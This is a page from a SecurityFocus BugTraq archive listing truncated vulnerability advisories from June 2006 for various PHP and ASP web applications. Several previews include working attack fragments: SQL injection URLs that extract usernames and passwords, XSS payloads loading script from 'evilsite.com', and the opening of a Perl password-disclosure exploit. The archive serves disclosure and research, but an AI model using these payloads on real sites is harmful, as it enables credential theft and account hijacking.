BugTraq Mode:
(Page 1129 of 1748)  < Prev  1124 1125 1126 1127 1128 1129 1130 1131 1132 1133 1134  Next >
file include in Xtreme Downloads v.1.0 2006-06-05
gamr-14 hotmail com
Multiple file include exploits in Xtreme Downloads v.1.0

script type : Xtreme Downloads v.1.0

bug found by : sweet-devil

team : site-down

type : file include

####################################################

exploits :

download.php

http://www.example.com/path/download.php?ro

[ more ]  [ reply ]
Re: Multiple Vendor NTFS Data Stream Malware Stealth Technique 2006-06-05
Andreas Marx (gega-it web de)
Hi,

besides the fact that it is always a good idea to notify vendors which might be affected *in advance* before releasing information like this, it's indeed nothing new.

You can find a more comprehensive review of AV products here:
<http://www.heise.de/security/artikel/52139/2>

This list should

[ more ]  [ reply ]
Re: PCPIN Chat <= 5.0.4 "login/language" remote cmmnds xctn 2006-06-04
k reznichak pcpin com
The patch has been released. Refer to http://www.pcpin.com for information.

[ more ]  [ reply ]
ASPScriptz Guest Book 2.0 XSS 2006-06-05
omnipresent email it
------------------------------------------------------------------

- ASPScriptz Guest Book 2.0 Remote XSS -

-= http://colander.altervista.org/advisory/ASzGB.txt =-

------------------------------------------------------------------

-= ASPScriptz Guest Book 2.0 =-

O

[ more ]  [ reply ]
[KAPDA::#47] - myNewsletter 1.1.2 SQL_Injection 2006-06-05
farhadkey yahoo com
[KAPDA::#47] - myNewsletter 1.1.2 SQL_Injection

SQL_Injection

-------

KAPDA New advisory

Vulnerable products : myNewsletter <= 1.1.2

Vendor: http://www.aspburst.com/index.asp

Risk: Medium

Vulnerability: SQL_Injection

Date :

--------------------

Found : 2006/06/05

Vendor Contacte

[ more ]  [ reply ]
[Kil13r-SA-20060606] ESTsoft InternetDISK Arbitary Code Execution Vulnerability 2006-06-05
mac68k gmail com
Title:

[Kil13r-SA-20060606] ESTsoft InternetDISK Arbitary Code Execution Vulnerability

Author:

Kil13r - http://www.kil13r.info/

Local / Remote:

Remote

Timeline:

2006/04/19 - Discovery

2006/04/19 - Vendor notification

2006/04/20 - Vendor response

2006/04/20 - Vendor patch release

200

[ more ]  [ reply ]
[Kil13r-SA-20060605] Syworks SafeNET Policy File Vulnerability 2006-06-05
mac68k gmail com
Title:

[Kil13r-SA-20060605] Syworks SafeNET Policy File Vulnerability

Author:

Kil13r - http://www.kil13r.info/

Local / Remote:

Local

Timeline:

2006/04/18 - Discovery

2006/06/05 - Release

Affected version:

All version of Syworks SafeNET

Not affected version:

In this time, none

[ more ]  [ reply ]
Dmx Forum <= v2.1a Remote Passwords Disclosure 2006-06-05
gmdarkfig gmail com
#!/usr/bin/perl

#

# by DarkFig -- www.acid-root.new.fr

#

use LWP::Simple;

if ( !$ARGV[1] ) {

header();

print "\n| Usage: <url> <member_id> ----------------|";

print "\n+------------------------------------------+";

print "\n| Example: http://localhost/dmx/ 1 ------|";

end();

}

sub

[ more ]  [ reply ]
[MajorSecurity #9]HostAdmin <= 3.1 - Remote File Include Vulnerability 2006-06-05
admin majorsecurity de
[MajorSecurity #9]HostAdmin <= 3.1 - Remote File Include Vulnerability

------------------------------------------------------------------------
-

Software: HostAdmin

Version: <=3.1

Type: Remote File Include Vulnerability

Date: June, 3rd 2006

Vendor: dreamcost

Page: http://dreamco

[ more ]  [ reply ]
Personal Information Disclosure/Account Hijacking Vulerability in mafia online games 2006-06-05
Ulrich Keil (securityfocus der-keiler de)
The mafia online games www.mafia1930.de, www.mafia1930.com and
www.the-mafia.de operated by e-sport GmbH are popular online
applications with over 400.000 accounts.
Although the basic game is free, many people upgrade to premium
accounts and invest real money to get special features.

An attacker is

[ more ]  [ reply ]
[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability 2006-06-05
admin majorsecurity de
[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability

------------------------------------------------------------------------
-

Software: DreamAccount

Version: <=3.1

Type: Remote File Include Vulnerability

Date: June, 3rd 2006

Vendor: dreamcost

Page: http://d

[ more ]  [ reply ]
Re: [Full Disclosure] [Kil13r-SA-20060520] Microsoft Internet Explorer Crash Vulnerability 2006-06-05
mac68k gmail com
Title:

[Kil13r-SA-20060520] Microsoft Internet Explorer Crash Vulnerability

Author:

Kil13r - http://www.kil13r.info/

Local / Remote:

Both

Timeline:

2003/12/28 - Discovery

2006/05/20 - Release

2006/06/05 - Update

Affected version:

Microsoft Internet Explorer 6 SP2 or earlier

Not

[ more ]  [ reply ]
Advisory 04/2006: DokuWiki PHP code execution vulnerability in spellchecker 2006-06-05
Stefan Esser (sesser hardened-php net)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hardened-PHP Project
www.hardened-php.net

-= Security Advisory =-

Advisory: DokuWiki PHP code execution vulnerability in spellchecker
Release Date: 2006/06/05
Last Modified

[ more ]  [ reply ]
ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability 2006-06-05
ajannhwt hotmail com
# Title : NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

# Author : ajann

### Vulnerability;

$$$ http://[target]/[path]/newscomments.php

Example:

$$ http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0
,username,userpassword,0,0,0,0,0,0,

[ more ]  [ reply ]
FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit 2006-06-05
ajannhwt hotmail com
# Title : FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit

# Author : ajann

REMOTE USER PASS CHANGE EXPLOİT;

Change: <input type="hidden" name="uid" value="1"> => ID AND action

************************************************************************
***********

[ more ]  [ reply ]
LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability 2006-06-05
ajannhwt hotmail com
# Title : LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability

# Author : ajann

#Vulnerability;

$$$ http://[target]/[path]/viewmsg.asp?msgid= SQL TEXT

$$$ Example:

http://[target]/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0
,0,email,0,0,0,0,0

[ more ]  [ reply ]
TSLSA-2006-0032 - multi 2006-06-05
Trustix Security Advisor (tsl trustix org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Trustix Secure Linux Security Advisory #2006-0032

Package names: kernel, postgresql
Summary: Multiple vulnerabilities
Date: 2006-06-05
Affected versi

[ more ]  [ reply ]
Kmita FAQ v1.0 2006-06-05
luny youfucktard com
Kmita FAQ v1.0

Homepage:

http://www.kmita-faq.com

Effected files:

search.php

index.php

Search.php does not sanatize user input before dynamically genrating it.

Proof of concept:

http://www.example.com/search.php?q=<SCRIPT%20SRC=http://evilsite.com/xs
s.js></SCRIPT>

SQL Injection pr

[ more ]  [ reply ]
LabWiki v1.0 2006-06-05
luny youfucktard com
LabWiki 1.0

Homepage:

http://www.bioinformatics.org/phplabware/labwiki/index.php

Effected files:

search.php

The search input box does not sanatize user input before dynamically genrating it.

XSS Proof of concept:

"><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><"

[ more ]  [ reply ]
CyBoards PHP Lite v1.25 (common.PHP) Remote File Inclusion 2006-06-04
SpC-x Bsdmail Org
######################################################

# CyBoards PHP Lite v1.25 (common.PHP) Remote File Inclusion

######################################################

# Credit : SpC-x | The-BeKiR

# Site : http://wWw.SaVSaK.CoM

######################################################

[ more ]  [ reply ]
Re: [Full-disclosure] bug in oscomerce 2006-06-04
Frank Laszlo (laszlof vonostingroup com)
this would require access to the administrator panel to work, how is
this a vuln?

zeus olimpusklan wrote:
> ########################################################################
###
> #Advisory #2 Title: file Modification in osCommerce
> #
> #
> # Author: 0o_zeus_o0
> # Contact: zeus@diosdelared

[ more ]  [ reply ]
# MHG Security Team ---Rumble 1.02 version Remote File Inc. 2006-06-04
MSN : erne [at] ernealizm [dot] com (beceriksiz1986 hotmail com)
# Milli-Harekat Advisory ( www.milli-harekat.org )

# Rumble <= 1.02 version - Remote File Include Vulnerabilities

# Risk : high

# Class: Remote

# Script : Rumble 1.02 version

# Msn : erne [at] ernealizm [dot] com

# Credits : ERNE

# Thanks : Dj_ReMix,The_bekir,SpC-x,Eskobar,Blackened,Poizonbox

[ more ]  [ reply ]
# MHG Security Team ---Rumble 1.02 version Remote File Inc. 2006-06-04
erne ernealizm com
# Milli-Harekat Advisory ( www.milli-harekat.org )

# Rumble <= 1.02 version - Remote File Include Vulnerabilities

# Risk : high

# Class: Remote

# Script : Rumble 1.02 version

# Msn : erne [at] ernealizm [dot] com

# Credits : ERNE

# Thanks : Dj_ReMix,The_bekir,SpC-x,Eskobar,Black

[ more ]  [ reply ]
Bookmark4U Remote File Include 2006-06-04
selfar2002 hotmail com (1 replies)


------------------------------------------------------------------------
---

Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities

------------------------------------------------------------------------
---

Discovered By SnIpEr_SA

Author : SnIpEr_SA

Remote : Yes

L

[ more ]  [ reply ]
Re: Bookmark4U Remote File Include 2006-06-05
str0ke (str0ke milw0rm com)
(Page 1129 of 1748)  < Prev  1124 1125 1126 1127 1128 1129 1130 1131 1132 1133 1134  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus